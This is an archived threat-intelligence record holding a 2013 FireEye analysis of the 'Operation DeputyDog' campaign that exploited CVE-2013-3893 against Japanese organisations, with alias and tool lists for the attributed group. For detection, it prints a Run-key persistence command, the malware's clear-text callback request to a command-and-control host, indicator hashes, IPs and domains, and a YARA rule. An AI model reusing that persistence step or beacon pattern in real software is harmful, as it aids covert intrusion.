{
	"id": "05da4842-020f-4e58-a061-930d16b9ae84",
	"created_at": "2026-04-06T00:06:20.026237Z",
	"updated_at": "2026-04-10T03:37:58.706101Z",
	"deleted_at": null,
	"sha1_hash": "65ca8fedb800ca4f2d52961ffdded12d84bd6fdb",
	"title": "Operation DeputyDog: Zero-Day (CVE-2013-3893) Attack Against Japanese Targets",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 173990,
	"plain_text": "Operation DeputyDog: Zero-Day (CVE-2013-3893) Attack Against\r\nJapanese Targets\r\nBy Ned Moran\r\nPublished: 2013-09-21 · Archived: 2026-04-05 18:57:39 UTC\r\nFireEye has discovered a campaign leveraging the recently announced zero-day CVE-2013-3893. This campaign,\r\nwhich we have labeled ‘Operation DeputyDog’, began as early as August 19, 2013 and appears to have targeted\r\norganizations in Japan. FireEye Labs has been continuously monitoring the activities of the threat actor\r\nresponsible for this campaign. Analysis based on our Dynamic Threat Intelligence cluster shows that this current\r\ncampaign leveraged command and control infrastructure that is related to the infrastructure used in the attack on\r\nBit9.\r\nCampaign Details\r\nOn September 17, 2013 Microsoft published details regarding a new zero-day exploit in Internet Explorer that was\r\nbeing used in targeted attacks. FireEye can confirm reports that these attacks were directed against entities in\r\nJapan. Furthermore, FireEye has discovered that the group responsible for this new operation is the same\r\nthreat actor that compromised Bit9 in February 2013.\r\nFireEye detected the payload used in these attacks on August 23, 2013 in Japan. The payload was hosted on a\r\nserver in Hong Kong (210.176.3.130) and was named “img20130823.jpg”. Although it had a .jpg file extension, it\r\nwas not an image file. The file, when XORed with 0x95, was an executable (MD5:\r\n8aba4b5184072f2a50cbc5ecfe326701).\r\nUpon execution, 8aba4b5184072f2a50cbc5ecfe326701 writes “28542CC0.dll” (MD5:\r\n46fd936bada07819f61ec3790cb08e19) to this location:\r\nC:\\Documents and Settings\\All Users\\Application Data\\28542CC0.dll\r\nIn order to maintain persistence, the original malware adds this registry key:\r\nHKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\28542CC0\r\nThe registry key has this value:\r\nrundll32.exe “C:\\Documents and Settings\\All Users\\Application Data\\28542CC0.dll”,Launch\r\nThe malware (8aba4b5184072f2a50cbc5ecfe326701) then connects to a host in South Korea (180.150.228.102).\r\nThis callback traffic is HTTP over port 443 (which is typically used for HTTPS encrypted traffic; however, the\r\ntraffic is neither HTTPS nor SSL encrypted). Instead, this clear-text callback traffic resembles this pattern:\r\nPOST /info.asp HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nAgtid: [8 chars]08x\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)\r\nHost: 180.150.228.102:443\r\nContent-Length: 1045\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n[8 chars]08x\u0026[Base64 Content]\r\nThe unique HTTP header “Agtid:” contains 8 characters followed by “08x”. The same pattern can be seen in the\r\nPOST content as well.\r\nA second related sample was also delivered from 111.118.21.105/css/sun.css on September 5, 2013. The sun.css\r\nfile was a malicious executable with an MD5 of bd07926c72739bb7121cec8a2863ad87, and it communicated using\r\nthe same protocol described above to the same command and control server at 180.150.228.102.\r\nRelated Samples\r\nWe found that both droppers, bd07926c72739bb7121cec8a2863ad87 and 8aba4b5184072f2a50cbc5ecfe326701,\r\nwere compiled on 2013-08-19 at 13:21:59 UTC. As we examined these files, we noticed a unique fingerprint.\r\nThese samples both had a string that may have been an artifact of the builder used to create the binaries. This\r\nstring was “DGGYDSYRL”, which we refer to as “DeputyDog”. As such, we developed the following YARA\r\nsignature, based on this unique attribute:\r\nrule APT_DeputyDog_Strings\r\n{\r\n    meta:\r\n        author = \"FireEye Labs\"\r\n        version = \"1.0\"\r\n        description = \"detects string seen in samples used in 2013-3893 0day attacks\"\r\n        reference = \"8aba4b5184072f2a50cbc5ecfe326701\"\r\n    strings:\r\n        $mz = {4d 5a}\r\n        $a = \"DGGYDSYRL\"\r\n    condition:\r\n        ($mz at 0) and $a\r\n}\r\nWe used this signature to identify 5 other potentially related samples:\r\nMD5 Compile Time (UTC) C2 Server\r\n58dc05118ef8b11dcb5f5c596ab772fd 2013-08-19 13:21:58 180.150.228.102\r\n4d257e569539973ab0bbafee8fb87582 2013-08-19 13:21:58 103.17.117.90\r\ndbdb1032d7bb4757d6011fb1d077856c 2013-08-19 13:21:59 110.45.158.5\r\n645e29b7c6319295ae8b13ce8575dc1d 2013-08-19 13:21:59 103.17.117.90\r\ne9c73997694a897d3c6aadb26ed34797 2013-04-13 13:42:45 110.45.158.5\r\nNote that all of the samples, except for e9c73997694a897d3c6aadb26ed34797, were compiled on 2013-08-19,\r\nwithin 1 second of each other.\r\nWe pivoted off the command and control IP addresses used by these samples and found the following known\r\nmalicious domains recently pointed to 180.150.228.102.\r\nDomain First Seen Last Seen\r\nea.blankchair.com 2013-09-01 05:02:22 2013-09-01 08:25:22\r\nrt.blankchair.com 2013-09-01 05:02:21 2013-09-01 08:25:24\r\nali.blankchair.com 2013-09-01 05:02:20 2013-09-01 08:25:22\r\ndll.freshdns.org 2013-07-01 10:48:56 2013-07-09 05:00:03\r\nLinks to Previous Campaigns\r\nAccording to Bit9, the attackers that penetrated their network dropped two variants of the HiKit rootkit.\r\nOne of these HiKit samples connected to a command and control server at downloadmp3server[.]servemp3[.]com\r\nthat resolved to 66.153.86.14. This same IP address also hosted www[.]yahooeast[.]net, a known malicious\r\ndomain, between March 6, 2012 and April 22, 2012.\r\nThe domain yahooeast[.]net was registered to 654@123.com. This email address was also used to register\r\nblankchair[.]com – the domain that we see was pointed to the 180.150.228.102 IP, which is the callback associated\r\nwith sample 58dc05118ef8b11dcb5f5c596ab772fd, and has been already correlated back to the attack leveraging\r\nthe CVE-2013-3893 zero-day vulnerability.\r\nThreat Actor Attribution\r\nConclusion\r\nWhile these attackers have demonstrated previously unknown zero-day exploits and a robust set of malware\r\npayloads, using the techniques described above, it is still possible for network defense professionals to develop a\r\nrich set of indicators that can be used to detect their attacks. This is the first part of our analysis; we will provide\r\nmore detailed analysis of the other components of this attack in a subsequent blog post.\r\nSource: https://web.archive.org/web/20130924130243/https://www.fireeye.com/blog/technical/cyber-exploits/2013/09/operation-deputydog-zero-day-cve-2013-3893-attack-against-japanese-targets.html",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MISPGALAXY",
		"Malpedia"
	],
	"references": [
		"https://web.archive.org/web/20130924130243/https://www.fireeye.com/blog/technical/cyber-exploits/2013/09/operation-deputydog-zero-day-cve-2013-3893-attack-against-japanese-targets.html"
	],
	"report_names": [
		"operation-deputydog-zero-day-cve-2013-3893-attack-against-japanese-targets.html"
	],
	"threat_actors": [
		{
			"id": "ee39ecf0-d311-49e5-b0ae-3e3d71f71def",
			"created_at": "2025-08-07T02:03:24.626625Z",
			"updated_at": "2026-04-10T02:00:03.605175Z",
			"deleted_at": null,
			"main_name": "BRONZE KEYSTONE",
			"aliases": [
				"APT17 ",
				"Aurora Panda ",
				"DeputyDog ",
				"Group 72 ",
				"Hidden Lynx ",
				"TG-8153 ",
				"Tailgater Team"
			],
			"source_name": "Secureworks:BRONZE KEYSTONE",
			"tools": [
				"9002",
				"BlackCoffee",
				"DeputyDog",
				"Derusbi",
				"Gh0stHTTPSDropper",
				"HiKit",
				"InternalCMD",
				"PlugX",
				"PoisonIvy",
				"ZxShell"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "86fd71d3-06dc-4b73-b038-cedea7b83bac",
			"created_at": "2022-10-25T16:07:23.330793Z",
			"updated_at": "2026-04-10T02:00:04.545236Z",
			"deleted_at": null,
			"main_name": "APT 17",
			"aliases": [
				"APT 17",
				"ATK 2",
				"Beijing Group",
				"Bronze Keystone",
				"Deputy Dog",
				"Elderwood",
				"Elderwood Gang",
				"G0025",
				"G0066",
				"Operation Aurora",
				"Operation DeputyDog",
				"Operation Ephemeral Hydra",
				"Operation RAT Cook",
				"SIG22",
				"Sneaky Panda",
				"TEMP.Avengers",
				"TG-8153",
				"Tailgater Team"
			],
			"source_name": "ETDA:APT 17",
			"tools": [
				"9002 RAT",
				"AGENT.ABQMR",
				"AGENT.AQUP.DROPPER",
				"AGENT.BMZA",
				"AGENT.GUNZ",
				"Agent.dhwf",
				"AngryRebel",
				"BlackCoffee",
				"Briba",
				"Chymine",
				"Comfoo",
				"Comfoo RAT",
				"Darkmoon",
				"DeputyDog",
				"Destroy RAT",
				"DestroyRAT",
				"Farfli",
				"Fexel",
				"Gen:Trojan.Heur.PT",
				"Gh0st RAT",
				"Ghost RAT",
				"Gresim",
				"HOMEUNIX",
				"HiKit",
				"HidraQ",
				"Homux",
				"Hydraq",
				"Jumpall",
				"Kaba",
				"Korplug",
				"Linfo",
				"MCRAT.A",
				"McRAT",
				"MdmBot",
				"Mdmbot.E",
				"Moudour",
				"Mydoor",
				"Naid",
				"Nerex",
				"PCRat",
				"PNGRAT",
				"Pasam",
				"PlugX",
				"Poison Ivy",
				"RedDelta",
				"Roarur",
				"SPIVY",
				"Sogu",
				"TIGERPLUG",
				"TVT",
				"Thoper",
				"Trojan.Naid",
				"Vasport",
				"Wiarp",
				"Xamtrav",
				"Zox",
				"ZoxPNG",
				"ZoxRPC",
				"gresim",
				"pivy",
				"poisonivy"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775433980,
	"ts_updated_at": 1775792278,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/65ca8fedb800ca4f2d52961ffdded12d84bd6fdb.pdf",
		"text": "https://archive.orkl.eu/65ca8fedb800ca4f2d52961ffdded12d84bd6fdb.txt",
		"img": "https://archive.orkl.eu/65ca8fedb800ca4f2d52961ffdded12d84bd6fdb.jpg"
	}
}